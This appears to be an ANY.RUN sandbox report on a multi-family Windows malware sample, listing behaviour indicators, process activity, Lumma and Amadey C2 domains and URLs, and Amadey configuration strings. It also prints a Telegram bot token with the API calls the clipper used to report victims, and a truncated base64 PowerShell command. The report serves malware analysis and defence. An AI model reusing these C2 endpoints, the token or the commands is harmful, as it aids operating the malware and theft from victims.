File name:

4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin

Full analysis: https://app.any.run/tasks/645e03f7-5d1c-4e27-9bb9-95c357571208
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: June 21, 2025, 17:15:12
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
lumma
stealer
themida
loader
amadey
botnet
rdp
evasion
telegram
vidar
stealc
netreactor
purehvnc
lclipper
clipper
auto-reg
autoit
rust
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 7 sections
MD5:

B32BD7269C36952AB16D9301D410D356

SHA1:

105BC5520ECEB89ABD09E9C47FD71B27002D2FB0

SHA256:

4EDF31270B3545C84273744E738A576BFBAE65FEBF6F469DF57A70AC09D8F665

SSDEEP:

98304:eJbqX+rf7BopxNGWfFbDjLttLUT2XapCrQHQPu9GGL1w+xczrhoqd3Lz9X+Ao5Cf:FL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • LUMMA has been detected (YARA)

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
    • Steals credentials from Web Browsers

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • MSBuild.exe (PID: 7544)
    • LUMMA mutex has been found

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
    • Actions looks like stealing of personal data

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • MSBuild.exe (PID: 7544)
    • AMADEY mutex has been found

      • ramez.exe (PID: 7860)
      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
      • ramez.exe (PID: 7280)
    • AMADEY has been detected (SURICATA)

      • ramez.exe (PID: 7860)
    • Connects to the CnC server

      • ramez.exe (PID: 7860)
    • AMADEY has been detected (YARA)

      • ramez.exe (PID: 7860)
    • PUREHVNC has been detected (YARA)

      • MSBuild.exe (PID: 7916)
      • MSBuild.exe (PID: 7324)
    • VIDAR mutex has been found

      • MSBuild.exe (PID: 7544)
    • VIDAR has been detected (YARA)

      • MSBuild.exe (PID: 7544)
    • LCLIPPER mutex has been found

      • c3b15afded.exe (PID: 6960)
      • GoogleChrome.exe (PID: 8048)
      • GoogleChrome.exe (PID: 7200)
    • Changes the autorun value in the registry

      • c3b15afded.exe (PID: 6960)
    • Executing a file with an untrusted certificate

      • blOahSM.exe (PID: 4120)
      • blOahSM.exe (PID: 7636)
      • EG11t89.exe (PID: 2532)
  • SUSPICIOUS

    • Reads the BIOS version

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • ramez.exe (PID: 7860)
      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
      • ramez.exe (PID: 7280)
      • c3b15afded.exe (PID: 6960)
      • GoogleChrome.exe (PID: 8048)
      • GoogleChrome.exe (PID: 7200)
    • Potential Corporate Privacy Violation

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • ramez.exe (PID: 7860)
    • Process requests binary or script from the Internet

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • ramez.exe (PID: 7860)
    • Connects to the server without a host name

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • ramez.exe (PID: 7860)
    • Searches for installed software

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • MSBuild.exe (PID: 7544)
    • Reads security settings of Internet Explorer

      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
      • ramez.exe (PID: 7860)
      • MSBuild.exe (PID: 7544)
      • c3b15afded.exe (PID: 6960)
      • GoogleChrome.exe (PID: 8048)
      • blOahSM.exe (PID: 4120)
      • blOahSM.exe (PID: 7636)
      • AutoIt3_x64.exe (PID: 7744)
    • Executable content was dropped or overwritten

      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • ramez.exe (PID: 7860)
      • c3b15afded.exe (PID: 6960)
      • blOahSM.exe (PID: 7636)
      • csc.exe (PID: 6164)
      • csc.exe (PID: 7976)
      • lab.exe (PID: 6940)
      • lab.exe (PID: 2272)
    • Starts itself from another location

      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
    • Contacting a server suspected of hosting an CnC

      • ramez.exe (PID: 7860)
    • There is functionality for taking screenshot (YARA)

      • ramez.exe (PID: 7860)
      • MSBuild.exe (PID: 7544)
    • There is functionality for enable RDP (YARA)

      • ramez.exe (PID: 7860)
    • Process drops legitimate windows executable

      • ramez.exe (PID: 7860)
      • blOahSM.exe (PID: 7636)
      • lab.exe (PID: 2272)
      • lab.exe (PID: 6940)
    • Starts a Microsoft application from unusual location

      • 4eTHv9F.exe (PID: 3540)
      • 4eTHv9F.exe (PID: 7368)
      • v999f8.exe (PID: 7552)
    • Checks for external IP

      • svchost.exe (PID: 2200)
      • 09NlD7c.exe (PID: 7740)
      • c3b15afded.exe (PID: 6960)
      • GoogleChrome.exe (PID: 8048)
    • Connects to unusual port

      • MSBuild.exe (PID: 7916)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 7544)
      • GoogleChrome.exe (PID: 8048)
    • The process executes via Task Scheduler

      • ramez.exe (PID: 7280)
    • The process bypasses the loading of PowerShell profile settings

      • MSBuild.exe (PID: 7544)
    • The process hide an interactive prompt from the user

      • MSBuild.exe (PID: 7544)
    • Starts POWERSHELL.EXE for commands execution

      • MSBuild.exe (PID: 7544)
    • Base64-obfuscated command line is found

      • MSBuild.exe (PID: 7544)
    • Multiple wallet extension IDs have been found

      • MSBuild.exe (PID: 7544)
    • BASE64 encoded PowerShell command has been detected

      • MSBuild.exe (PID: 7544)
    • Starts CMD.EXE for commands execution

      • c3b15afded.exe (PID: 6960)
      • cmd.exe (PID: 1984)
      • blOahSM.exe (PID: 7636)
      • lab.exe (PID: 6940)
    • The executable file from the user directory is run by the CMD process

      • GoogleChrome.exe (PID: 8048)
      • Python.exe (PID: 8128)
    • Application launched itself

      • cmd.exe (PID: 1984)
      • blOahSM.exe (PID: 4120)
      • lab.exe (PID: 2272)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 6360)
    • Reads the date of Windows installation

      • jzQILRF.exe (PID: 1268)
      • blOahSM.exe (PID: 4120)
      • blOahSM.exe (PID: 7636)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • GoogleChrome.exe (PID: 8048)
    • The process drops C-runtime libraries

      • blOahSM.exe (PID: 7636)
      • lab.exe (PID: 2272)
      • lab.exe (PID: 6940)
    • Starts the AutoIt3 executable file

      • blOahSM.exe (PID: 7636)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 3092)
      • powershell.exe (PID: 640)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3092)
      • powershell.exe (PID: 640)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6164)
      • csc.exe (PID: 7976)
    • Executing commands from ".cmd" file

      • blOahSM.exe (PID: 7636)
    • Executing commands from a ".bat" file

      • lab.exe (PID: 6940)
    • Process drops python dynamic module

      • lab.exe (PID: 2272)
  • INFO

    • Checks supported languages

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
      • ramez.exe (PID: 7860)
      • 4eTHv9F.exe (PID: 3540)
      • 4eTHv9F.exe (PID: 7368)
      • MSBuild.exe (PID: 7324)
      • 09NlD7c.exe (PID: 7740)
      • MSBuild.exe (PID: 7916)
      • v999f8.exe (PID: 7552)
      • MSBuild.exe (PID: 7544)
      • ramez.exe (PID: 7280)
      • c3b15afded.exe (PID: 6960)
      • GoogleChrome.exe (PID: 8048)
      • GoogleChrome.exe (PID: 7200)
      • jzQILRF.exe (PID: 1268)
      • blOahSM.exe (PID: 4120)
      • blOahSM.exe (PID: 7636)
      • csc.exe (PID: 6164)
      • cvtres.exe (PID: 868)
      • EG11t89.exe (PID: 2532)
      • AutoIt3_x64.exe (PID: 7744)
      • csc.exe (PID: 7976)
      • cvtres.exe (PID: 4864)
      • lab.exe (PID: 2272)
      • lab.exe (PID: 6940)
      • Python.exe (PID: 8128)
    • Reads the computer name

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • ramez.exe (PID: 7860)
      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
      • MSBuild.exe (PID: 7324)
      • 09NlD7c.exe (PID: 7740)
      • MSBuild.exe (PID: 7916)
      • MSBuild.exe (PID: 7544)
      • c3b15afded.exe (PID: 6960)
      • GoogleChrome.exe (PID: 8048)
      • jzQILRF.exe (PID: 1268)
      • blOahSM.exe (PID: 4120)
      • blOahSM.exe (PID: 7636)
      • AutoIt3_x64.exe (PID: 7744)
      • EG11t89.exe (PID: 2532)
    • Reads the machine GUID from the registry

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • MSBuild.exe (PID: 7324)
      • 09NlD7c.exe (PID: 7740)
      • MSBuild.exe (PID: 7916)
      • MSBuild.exe (PID: 7544)
      • GoogleChrome.exe (PID: 8048)
      • jzQILRF.exe (PID: 1268)
      • AutoIt3_x64.exe (PID: 7744)
      • csc.exe (PID: 6164)
      • ramez.exe (PID: 7860)
      • csc.exe (PID: 7976)
      • EG11t89.exe (PID: 2532)
      • lab.exe (PID: 6940)
    • Application launched itself

      • chrome.exe (PID: 3572)
      • chrome.exe (PID: 7260)
      • chrome.exe (PID: 1700)
      • msedge.exe (PID: 6800)
      • msedge.exe (PID: 1352)
      • chrome.exe (PID: 8076)
      • msedge.exe (PID: 1096)
      • msedge.exe (PID: 7672)
      • msedge.exe (PID: 6356)
      • msedge.exe (PID: 8128)
      • chrome.exe (PID: 7548)
      • chrome.exe (PID: 8068)
      • chrome.exe (PID: 7608)
      • chrome.exe (PID: 7536)
      • chrome.exe (PID: 5432)
      • chrome.exe (PID: 3980)
      • chrome.exe (PID: 7352)
      • chrome.exe (PID: 7156)
      • chrome.exe (PID: 4168)
      • chrome.exe (PID: 7304)
      • chrome.exe (PID: 6892)
      • chrome.exe (PID: 188)
    • Themida protector has been detected

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • ramez.exe (PID: 7860)
    • Reads the software policy settings

      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • 09NlD7c.exe (PID: 7740)
      • MSBuild.exe (PID: 7544)
      • powershell.exe (PID: 1208)
      • GoogleChrome.exe (PID: 8048)
      • slui.exe (PID: 724)
      • powershell.exe (PID: 7288)
      • jzQILRF.exe (PID: 1268)
      • powershell.exe (PID: 7152)
      • powershell.exe (PID: 6428)
      • powershell.exe (PID: 3092)
      • powershell.exe (PID: 640)
      • ramez.exe (PID: 7860)
      • powershell.exe (PID: 7556)
    • Create files in a temporary directory

      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
      • 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe (PID: 3832)
      • ramez.exe (PID: 7860)
      • MSBuild.exe (PID: 7544)
      • powershell.exe (PID: 1208)
      • powershell.exe (PID: 7288)
      • powershell.exe (PID: 7152)
      • powershell.exe (PID: 6428)
      • blOahSM.exe (PID: 7636)
      • powershell.exe (PID: 3092)
      • AutoIt3_x64.exe (PID: 7744)
      • cvtres.exe (PID: 868)
      • csc.exe (PID: 6164)
      • powershell.exe (PID: 640)
      • cvtres.exe (PID: 4864)
      • csc.exe (PID: 7976)
      • lab.exe (PID: 2272)
      • lab.exe (PID: 6940)
      • powershell.exe (PID: 7556)
    • Process checks computer location settings

      • SA2XVRDOJ6TCOMT25UKFFLK8PDBY08.exe (PID: 7712)
      • ramez.exe (PID: 7860)
      • blOahSM.exe (PID: 4120)
      • blOahSM.exe (PID: 7636)
    • Checks proxy server information

      • ramez.exe (PID: 7860)
      • 09NlD7c.exe (PID: 7740)
      • MSBuild.exe (PID: 7544)
      • c3b15afded.exe (PID: 6960)
      • GoogleChrome.exe (PID: 8048)
      • slui.exe (PID: 724)
      • jzQILRF.exe (PID: 1268)
    • Creates files or folders in the user directory

      • ramez.exe (PID: 7860)
      • MSBuild.exe (PID: 7544)
      • c3b15afded.exe (PID: 6960)
      • GoogleChrome.exe (PID: 8048)
    • The sample compiled with english language support

      • ramez.exe (PID: 7860)
      • blOahSM.exe (PID: 7636)
      • lab.exe (PID: 2272)
      • lab.exe (PID: 6940)
    • Creates files in the program directory

      • MSBuild.exe (PID: 7544)
    • .NET Reactor protector has been detected

      • MSBuild.exe (PID: 7324)
      • MSBuild.exe (PID: 7916)
    • Reads product name

      • MSBuild.exe (PID: 7544)
    • Reads Environment values

      • MSBuild.exe (PID: 7544)
      • AutoIt3_x64.exe (PID: 7744)
    • Reads CPU info

      • MSBuild.exe (PID: 7544)
    • Application based on Rust

      • 09NlD7c.exe (PID: 7740)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1208)
      • powershell.exe (PID: 7288)
      • powershell.exe (PID: 7152)
      • powershell.exe (PID: 6428)
      • powershell.exe (PID: 3092)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7560)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 1208)
      • powershell.exe (PID: 7288)
      • powershell.exe (PID: 7152)
      • powershell.exe (PID: 6428)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1208)
      • powershell.exe (PID: 7288)
      • powershell.exe (PID: 7152)
      • powershell.exe (PID: 6428)
    • Launching a file from a Registry key

      • c3b15afded.exe (PID: 6960)
    • Manual execution by a user

      • GoogleChrome.exe (PID: 7200)
    • Reads mouse settings

      • AutoIt3_x64.exe (PID: 7744)
    • Python executable

      • Python.exe (PID: 8128)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Lumma

(PID) Process(3832) 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
C2 (9)ropyi.xyz/zadf
skjgx.xyz/riuw
gewgb.xyz/axgh
baviip.xyz/twiw
equidn.xyz/xapq
spjeo.xyz/axka
firddy.xyz/yhbc
shaeb.xyz/ikxz
trqqe.xyz/xudu

Amadey

(PID) Process(7860) ramez.exe
C2185.156.72.96
URLhttp://185.156.72.96/te4h2nus/index.php
Version5.34
Options
Drop directoryd610cf342e
Drop nameramez.exe
Strings (125)Powershell.exe
/te4h2nus/index.php
ramez.exe
bi:
185.156.72.96
AVAST Software
/Plugins/
------
id:
\0000
wb
Programs
-%lu
.jpg
AVG
r=
dm:
-executionpolicy remotesigned -File "
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\
ProgramData\
Avira
e2
os:
http://
vs:
<c>
2025
ComputerName
og:
00000419
rb
2022
Content-Type: application/x-www-form-urlencoded
shell32.dll
https://
Main
Sophos
Norton
GET
#
S-%lu-
st=s
cmd /C RMDIR /s/q
lv:
msi
Content-Disposition: form-data; name="data"; filename="
5.34
d1
2016
ar:
cred.dll|clip.dll|
rundll32
WinDefender
Content-Type: multipart/form-data; boundary=----
Rem
CurrentBuild
0123456789
&& Exit"
un:
Kaspersky Lab
d610cf342e
Bitdefender
+++
av:
rundll32.exe
random
<d>
Keyboard Layout\Preload
shutdown -s -t 0
DefaultSettings.XResolution
/quiet
--
0000043f
Startup
e1
Doctor Web
2019
GetNativeSystemInfo
VideoID
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
:::
ESET
DefaultSettings.YResolution
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
" && ren
abcdefghijklmnopqrstuvwxyz0123456789-_
cmd
"taskkill /f /im "
00000423
-unicode-
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
cred.dll
360TotalSecurity
"
exe
00000422
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
&&
Comodo
" Content-Type: application/octet-stream
------
?scr=1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
zip
dll
/k
&unit=
ps1
" && timeout 1 && del
kernel32.dll
ProductName
%-lu
clip.dll
%USERPROFILE%
\App
SYSTEM\ControlSet001\Services\BasicDisplay\Video
pc:
sd:
POST
Panda Security
e3
|
=

ims-api

(PID) Process(8048) GoogleChrome.exe
Telegram-Tokens (1)7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
Telegram-Info-Links
7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
Get info about bothttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getMe
Get incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getUpdates
Get webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1J
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1 User-Agent: ClpBot Host: api.telegram.org Cache-Control: no-cache
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:06:16 14:51:43+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 311296
InitializedDataSize: 37888
UninitializedDataSize: -
EntryPoint: 0x489000
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
324
Monitored processes
189
Malicious processes
18
Suspicious processes
5

Behavior graph

Click at the process to see the details
start #LUMMA 4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs slui.exe sa2xvrdoj6tcomt25ukfflk8pdby08.exe #AMADEY ramez.exe 4ethv9f.exe no specs conhost.exe no specs msbuild.exe no specs #PUREHVNC msbuild.exe 4ethv9f.exe no specs conhost.exe no specs #PUREHVNC msbuild.exe no specs 09nld7c.exe svchost.exe v999f8.exe no specs conhost.exe no specs #VIDAR msbuild.exe ramez.exe no specs chrome.exe powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs #LCLIPPER c3b15afded.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs #LCLIPPER googlechrome.exe #LCLIPPER googlechrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs jzqilrf.exe chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs bloahsm.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs bloahsm.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs autoit3_x64.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs eg11t89.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs lab.exe lab.exe cmd.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs python.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
188"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exeMSBuild.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
640C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "IwAgACsAQQAgAEcAUQB6ADgALgBRAEAANwB0AEIAPwApAH0AUQAzADsASwB1AHUAbwAkAFsAJQBUAFoAXgBOAEMAVABwACEAVgBsAHMAUQAoAHQANQBZADwATgBDAFoAQwAuAHcAMgBCADYARABTADkATAAoAF8ARwBPAFYAWgBaAC4AMwB1AHsAbgA/AG0ATABkAGMAawArAFsAJQA9ADoAZQB2ADIAfQBTAHAASQBFAEoAaQArAFEAMwB0AGIAYwBKAG0AdwAtAFUAaQAhAH0ARQBdAHUAWgBZAFEATgBdAD8AKABIAGoAQgA3ADAAeAA4AHgAVABpAD0AZgBdADMAaAAoAFQAOQBOAHIAZgBbACkAZwA4AHAAfABhAHEAQwBuAFoALQAqAFAAewApADYAVQAuAGkAMABdAGkAQQBrACYANgBYAG8AKABUAD0ANAA4ACQAagBmAGcAZABLAFIAWQAhAGEALgA3AGMANgBpAHEAZQA+ADgAYwB6ACEAVgBDAFoARwBhACMAOwBKACMANABwADUAawBCAFcAbgAxADQANgB0AFEAVgAqAGcAQQBNACwAUABmAGcAJgBzAGEAYgBoADwAXgBWACMAcgAjACEAQgBlAFoAOwBDAGoAVwBrACkAeQApAG8ALgBbAFkAZwBmACMAYQBnACYAWgBvAC0AbgA4AF0AfAB3AG0AeAA6ACAAcgAmAEQAOwBPAGcAYQBuAHEARQBTAFUARwAlADgAMQBrAGUAcAAqAFYAeAB1AFkAaABlADMAeAAzAGUAUAB2AFoAIQBUAEIAMwBSAGQAbQBlADQASAB0AC0AYwB5AFgAbABKAGwALABYAFIAbgBQADUAbABiAGMAWwBGAEAASQBaAHYAWAA9AEoAVAAwAGYAdQBWAFcAOQB6AG4AZgB1AFsATwBdACgAYwBXAHkAJQBMAEIAUQBbAHQALgBTACwANgAgAGgAVABtAHoAegA8ADIALgAuADwARgAwAEIANwBhADQATQBmAEoAIQBkAGcAagBeAHsAVgB6ADIAewBHADgAaABzADIAcQB9ACMAcQBWAHAAKwA4AEEATQBJAEMAZABWADcAfABxAHcATQB8ADoARQBwAFkAKgAoAHwAbAB8ADQAXQANAAoAIAAgACAAIwAgACwAdABSAGEAMABwAFcANABmAHUAYQAwACsASwBNAEcAKwB9AGwAKgBoAF8ATABAACYAZgBHAF0AIwBUAEcATgBZACkALgBHACwAOwAgAHgAXQBnAG4ARwBCAG8AMQBbAGkAZwA9AG8AJQBuADQAMgA9AE0AYgBTAFsAVAB0AFYARgBnAEYAQgBpAD0ATgBfAFEAIQBMADcAdgAkADsAQQBsAE8AewApAE8ANwBlACwAIwA/ACkAJQBCAC4ALgA2AGkAYgBJAHAAVQAsADgAQAB9AEgAIwBkAFUAMgBoAFcAfQAwAHcARwBNAG4AJQAzAHkAbwBdAHoATwBuACEAYQBVAG4ALQArAEcAMwBsAHEAbgBFAGUAYQBmADMARQAtAGkANABnAG4AQgB9AFQANgBnAFUAOQBYAC0AdgAjAE0AIAAsADgAaAB1AF0AWgBKACAAMQBLADEAJABtADAANwAqAGMAbAApAFYAIAA7ADMAMwAyAF0ATAA5AHQAbwA0AFIAYwBDAC0ASgAuADAAVwBfACwAegA6AGUAegBjAFcAKABTAHkAWgApAHYALgBvAHkAegBNAD0ATQB5AFYARgB6AH0ATQByADAAQgA+AE0AOwBlADIAUQBLAFsAdABqADwAfQAkAEcAKQBHAHIAQABwAHAAaQBkACwAKwAyADYAPQBzAGsAeABVAGkARwBuAHEAeQB8AHYAJQAwADEASgBpAFoAKQBFACMAZgBRAHEAdwBNADgAaQByAHMAZwA4AHIAMABwAHsAJQB1AGsAawBtAEoAcwBqACgAZwAgAFEAbwAjACEASQAsAFsAIAA7AGoAcQBsAEMAdQB0AHsAewBhADYAOgBIACoAUQBQAHwAeQBUAGcAIQBMACEAXwBHAFcAZwA2ACEAJQBGAFYAIABvAHwAIQBUAFAANwAhAH0AIwAhAGwAdABhADwAZQAwADIAWgA1ACwAVQA2AF8AZQBfAEYAOwBTAE4ATgBrAFYATABZAFAAbQA7AFMAIABrACQAVAB7AGoAaAAjAFgAMwBbADkAMQA9AHAARgB5AFAAaQB1AE8AYwA0AG8AWwBbAG4AZQBkAEEANgBQACsAaAAwACMAagBHADwASgBGAEsAZAA4ACMAUQA9AD8AbQBlAEMAbQBEADwAIAA2ADMAVwBNAHgAOABNAH0AeAAqAGUAUgB0AF4AVQBBACsAIQA/ADMAXgBAADkAeQBOADoAdwBtAA0ACgAgACAAIwAgAG0AbwA3AEsAPwBIACgAewA2ACEAOgBjAF0AYwBfADcAcwBDAHYAVwBTAGoAZgB9AGQAcgBWAGEAawBzAF8AXwBmAFYAUgA9AF8AcQBkAFAAJgBhAFsARQAsADQATQBqACgAbgB0AG4ALQBrAFEAfQBIAFcAawBdAC4APQAlAFEAOwA6ADkAJAAqACMAbwAoAFEASwBoAFAAMwBCACUAWABmAF8AdAA2AHwAeABSAGEAdQAjAGsAQwA/AG0APwBZAGwAWwBZAHIAbABiAHUAOwAtAC4AKgBdAGUAcwBRACAAKQBOADwAIwBOAFIAQwBMAF8ATgA+ACoAWAA7AEkAfABJAGEAKgAuACwASABWAC0AYwApACgAdQAuAFgAdABoAEQAJQB8ADYAdgAuAFIATwBVAFMAdAA8ACUAJgAhAFEAeQBDAHAAYwA4AFUALABuADQAWwBqADAAVgAkAHwAbgBSADQAYgB8AEMAZwBLADsAeQBwAFMAVwA0ACYAawBxACEAbQAgAEwAUgBoADEAPgBuACoAUgBiACYAegBdAHAAawBWAFsAYgAhACgAXgBwAG0AagBoADwAaQBCAFAAPQByADMAT